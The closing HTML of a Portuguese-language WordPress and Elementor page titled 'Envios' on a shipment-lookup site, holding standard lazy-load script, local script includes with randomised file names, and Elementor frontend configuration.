					const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` );
					const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => {
						entries.forEach( ( entry ) => {
							if ( entry.isIntersecting ) {
								let lazyloadBackground = entry.target;
								if( lazyloadBackground ) {
									lazyloadBackground.classList.add( 'e-lazyloaded' );
								}
								lazyloadBackgroundObserver.unobserve( entry.target );
							}
						});
					}, { rootMargin: '200px 0px 200px 0px' } );
					lazyloadBackgrounds.forEach( ( lazyloadBackground ) => {
						lazyloadBackgroundObserver.observe( lazyloadBackground );
					} );
				};
				const events = [
					'DOMContentLoaded',
					'elementor/lazyload/observe',
				];
				events.forEach( ( event ) => {
					document.addEventListener( event, lazyloadRunObserver );
				} );
			</script>
			<script src="js/6imtsiwND5fN.js" id="hello-theme-frontend-js"></script>
<script src="js/vnD5vVM3ZIhi.js" id="elementor-pro-webpack-runtime-js"></script>
<script src="js/ooxPcp0DJONI.js" id="elementor-webpack-runtime-js"></script>
<script src="js/hXP4Pr4PUM5C.js" id="jquery-core-js"></script>
<script src="js/U9XZ6eAQTzNv.js" id="jquery-migrate-js"></script>
<script src="js/WpozsVEqSrrM.js" id="elementor-frontend-modules-js"></script>
<script src="js/wSOSNRPSqogB.js" id="wp-hooks-js"></script>
<script src="js/PYSPo2UPbUMm.js" id="wp-i18n-js"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script id="elementor-pro-frontend-js-before">
var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/consulta-envios-online.com\/wp-admin\/admin-ajax.php","nonce":"009ac6af86","urls":{"assets":"https:\/\/consulta-envios-online.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/consulta-envios-online.com\/wp-json\/"},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"facebook_sdk":{"lang":"pt_BR","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/consulta-envios-online.com\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}};
</script>
<script src="js/GorBcvvEKiwz.js" id="elementor-pro-frontend-js"></script>
<script src="js/kCxgOeZEg3gA.js" id="elementor-waypoints-js"></script>
<script src="js/SxtsAMXDghG1.js" id="jquery-ui-core-js"></script>
<script id="elementor-frontend-js-before">
var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Compartilhar no Facebook","shareOnTwitter":"Compartilhar no Twitter","pinIt":"Fixar","download":"Baixar","downloadImage":"Baixar imagem","fullscreen":"Tela cheia","zoom":"Zoom","share":"Compartilhar","playVideo":"Reproduzir v\u00eddeo","previous":"Anterior","next":"Pr\u00f3ximo","close":"Fechar","a11yCarouselWrapperAriaLabel":"Carrossel | Rolagem horizontal: Setas para esquerda e direita","a11yCarouselPrevSlideMessage":"Slide anterior","a11yCarouselNextSlideMessage":"Pr\u00f3ximo slide","a11yCarouselFirstSlideMessage":"Este \u00e9 o primeiro slide","a11yCarouselLastSlideMessage":"Este \u00e9 o \u00faltimo slide","a11yCarouselPaginationBulletMessage":"Ir para o slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Dispositivos m\u00f3veis no modo retrato","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Dispositivos m\u00f3veis no modo paisagem","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet no modo retrato","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet no modo paisagem","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Notebook","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Tela ampla (widescreen)","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.23.4","is_static":false,"experimentalFeatures":{"e_optimized_css_loading":true,"e_font_icon_svg":true,"additional_custom_breakpoints":true,"container":true,"container_grid":true,"e_swiper_latest":true,"e_nested_atomic_repeaters":true,"e_optimized_control_loading":true,"e_onboarding":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"home_screen":true,"editor_v2":true,"ai-layout":true,"e_lazyload":true,"e_element_cache":true,"link-in-bio":true,"floating-buttons":true,"display-conditions":true,"form-submissions":true,"taxonomy-filter":true},"urls":{"assets":"https:\/\/consulta-envios-online.com\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/consulta-envios-online.com\/wp-admin\/admin-ajax.php"},"nonces":{"floatingButtonsClickTracking":"8fc5a4ad8a"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"logo","hello_footer_logo_type":"logo"},"post":{"id":21,"title":"Envios","excerpt":"","featuredImage":false}};
</script>
<script src="js/YIaG2In98Vxf.js" id="elementor-frontend-js"></script>
<script src="js/PyGZvodv06Kx.js" id="pro-elements-handlers-js"></script>
	



</body></html><!-- Page cached by LiteSpeed Cache 6.5.0.2 on 2024-09-30 14:20:10 -->